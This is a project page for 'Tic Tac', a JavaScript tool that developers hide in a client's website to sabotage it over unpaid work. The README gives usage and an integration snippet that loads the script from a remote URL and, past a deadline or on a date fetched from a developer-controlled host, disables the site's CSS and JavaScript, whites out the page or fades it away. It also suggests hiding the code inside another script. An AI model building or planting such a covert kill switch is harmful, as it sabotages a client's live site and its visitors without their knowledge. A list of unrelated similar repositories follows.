All Projects → Sanix-Darker → Tic Tac

Sanix-Darker / Tic Tac

Client not paid ? This is the solution of your problem

Programming Languages

javascript
184084 projects - #8 most used programming language
hack
652 projects

Projects that are alternatives of or similar to Tic Tac

CyberPunkNetrunner
Cyberpunk 2077 Netrunner Hacking Tool (Easy to use and install). Don't use it on illegal and malicious activity. Inspired by the game CyberPunk 2077 https://www.cyberpunk.net/
Stars: ✭ 69 (+137.93%)
Mutual labels:  programmer, easy-to-use, easy
Lang-app
Add a multi lang configuration to your WEB APP 'from scratch' [ANY FRAMEWORK, ANY PLUGIN, ANY API]
Stars: ✭ 15 (-48.28%)
Mutual labels:  easy-to-use, easy
discord.json
Discord.json | Make your own discord bot with json !
Stars: ✭ 27 (-6.9%)
Mutual labels:  easy-to-use, easy
killswitch-windows
VPN kill switch for windows.
Stars: ✭ 22 (-24.14%)
Mutual labels:  protection, easy-to-use
terms-dictionary
Simple definitions of terms, acronyms, abbreviations, companies, and projects related to financial services and Moov.
Stars: ✭ 48 (+65.52%)
Mutual labels:  money, payment
easymail
Easy way to install a mail server.
Stars: ✭ 60 (+106.9%)
Mutual labels:  easy-to-use, easy
DM-BOT
📧 DM-BOT is discord bot that can record direct messages. One of us! You can also reply to those messages! DM-BOT is easy to use & understand! I decided to use Discord.js, it's literally the best.
Stars: ✭ 31 (+6.9%)
Mutual labels:  easy-to-use, easy
Zold
An Experimental Non-Blockchain Cryptocurrency for Fast Micro Payments
Stars: ✭ 183 (+531.03%)
Mutual labels:  payment, money
FinanceKit
FinanceKit is a Framework for iOS and Mac to build apps working with financial data, like money, currencies, stocks, portfolio, transactions and other concepts.
Stars: ✭ 15 (-48.28%)
Mutual labels:  money, payment
flutter paystack
💳 A robust Flutter plugin for making payments via Paystack Payment Gateway. Completely supports Android and iOS
Stars: ✭ 146 (+403.45%)
Mutual labels:  money, payment
tz-mpesa-ussd-push
Vodacom Tanzania USSD Push API Client
Stars: ✭ 18 (-37.93%)
Mutual labels:  money, payment
ytmous
Anonymous Youtube Proxy
Stars: ✭ 60 (+106.9%)
Mutual labels:  easy-to-use, easy
Easy.common
A set of useful utilities and helpers used across Easy.* projects.
Stars: ✭ 306 (+955.17%)
Mutual labels:  easy-to-use, easy
Tkinter-Designer
An easy and fast way to create a Python GUI 🐍
Stars: ✭ 4,697 (+16096.55%)
Mutual labels:  easy-to-use, easy
Ach
ACH implements a reader, writer, and validator for Automated Clearing House (ACH) files. The HTTP server is available in a Docker image and the Go package is available.
Stars: ✭ 210 (+624.14%)
Mutual labels:  payment, money
angular4-paystack
💵 An angular2+ module for paystack transactions
Stars: ✭ 51 (+75.86%)
Mutual labels:  money, payment
Easy.messagehub
No need for .NET Events! A thread-safe, high performance & easy to use cross platform implementation of the Event Aggregator Pattern.
Stars: ✭ 208 (+617.24%)
Mutual labels:  easy-to-use, easy
Paymentfont
A sleek webfont featuring your favourite payment methods
Stars: ✭ 1,586 (+5368.97%)
Mutual labels:  payment, money
CNN Own Dataset
CNN example for training your own datasets.
Stars: ✭ 25 (-13.79%)
Mutual labels:  easy-to-use, easy
Django Admin Easy
Collection of admin fields and decorators to help to create computed or custom fields more friendly and easy way
Stars: ✭ 265 (+813.79%)
Mutual labels:  easy-to-use, easy

Tic-Tac

Client not paid ?

Put a deadline on a project or just activate/desactivate it remotely For personnals reasons (Never get paid on a project, etc...), kill CSS, JS, show a whiteScreen or add opacity to the body tag and decrease it every day until their site completely fades away.

NOTE: "Am not responsible in the bad use of this project"

How it work?

A date format and a deadline is given in parameter to the system TicTac which evaluates whether or not the deadline has already arrived or not. If so then it hides the style and script of the page of the visitor momentarily for an unreadable rendition so that we do not call the developer again

Features

  • KillJS of the project in the browser rendering.
  • KillCSS of the project in the browser rendering.
  • Make the screen becomes completely WHITE in the browser rendering.
  • Put a DeadLine for all this feature to happens.
  • Set theese parameters remotely.

Basic usage:

// Import the script
// then
// "MONTH / DAY / YEAR"
// 07/07/2019: the date
checkDate(['07/07/2019']);

More options

/**
* [tictac_options description]
* @param  {[type]}  date        (Required) [The date (For 'en' format date use: Month/Day/Year For 'fr' format date use: Day/Month/Year)]
* @param  {Boolean} killCss     (optional) [To Lock or Unlock  only Style]
* @param  {Boolean} killJs      (optional) [To Lock or Unlock  only Script code]
* @param  {Boolean} whitescreen (optional) [To show a WhiteScreen]
*/
var tictac_options = ['07/07/2019'];

// CASE 1 :
// params: "MONTH / DAY / YEAR",   true,    true,     false
// What will be done: Kill CSS, Kill JS, don't show White screen
// var tictac_options = ['04/05/2019', true, true, false];

// CASE 2 :
// params: "MONTH / DAY / YEAR",   true,    true,     true
// What will be done: Show White screen (and kill every thing)
// var tictac_options = ['04/05/2019', true, true, true];

/**
* [checkDate description]
* Default use: checkDate(tictac_options);
* Remotely use: checkDate(null, [true, 'https://My_Secret_Hosting_DateLine.com/finalDateForWebSitedash.txt']);
* @param  {Array}   remoteDead  (optional) [To access a Hosted date Ex: [false, 'https://My_Secret_Hosting_DateLine.com/finalDateForWebSitedash.txt']  in the file respect this format en, 04/06/2019 ]
*/
// Default
// "MONTH / DAY / YEAR", killCss, killJs, WhiteScreen
var tictac_options = ['01/01/2019', false, false, true];
checkDate(tictac_options);

// Remote Mode
// http://127.0.0.1:8081 is a host you specify where the file with all parameters to fetch will be found
var remoteDead = [true, 'http://127.0.0.1:8081/finalDateForWebSitedash.txt'];
checkDate(null, [true, remoteDead);

Complete integration example

Example of integration

<head>
	<title>A webSite Title</title>

	<!-- Put these few lines of code in your HEAD tag of page before ANY script in your website or you can hide it in a personnal script -->
	<!-- First, import tictac and then config your deadline date -->
	<script src="https://rawgit.com/Sanix-Darker/Tic-Tac/master/js/tictac.min.js"></script>
	<script type="text/javascript">
		checkDate(['12/27/2019']);
	</script>
</head>
<body>
	...The Website content...
</body>
NB: What's really coul with Tic Tac is that, it affect "any files" in your website, he just "Bichakalla" the user's rendering.

Author

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].